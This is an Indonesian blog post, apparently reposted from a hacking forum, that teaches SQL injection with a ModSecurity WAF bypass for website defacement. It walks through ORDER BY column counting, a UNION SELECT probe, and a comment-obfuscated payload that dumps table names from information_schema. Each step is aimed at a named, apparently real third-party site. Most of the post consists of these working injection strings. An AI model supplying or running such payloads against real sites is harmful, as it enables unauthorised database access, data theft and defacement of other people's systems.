• Posted by : indoanim Sunday, April 20, 2014

    Assalamuallaikum sobat IDCA.
    Setelah sekian lama engak ngepost masalah deface, nih kita mulai singgung lagi :D



    Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :

    1. Contoh target
    http://www.harshstones.com/product-detail.php?id=35

    2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "
    http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal
    http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal
    http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal
    http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal 
    http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error
    Berarti jumlah table databasenya adalah 12

    3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
    Sekarang kita jalankan perintahnya
    http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--
     

    4. Sekarang kita bypass dengan perintah :

    /*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

    5. Sekarang kita coba dengan site diatas :
    http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--
     

    Nah sekian artikel yang bisa saya sampaikan, tutorial ini ditulis oleh AtzShahab di forum kami.
    Jika ada kendala silahkan kunjungi link disini

    Author : AtzShahab
    Rew-Post by Bimo Septiawan

    0 comments

  • Copyright © - Network Tips - Network Tips - Powered by Blogger - Designed by inggisxXx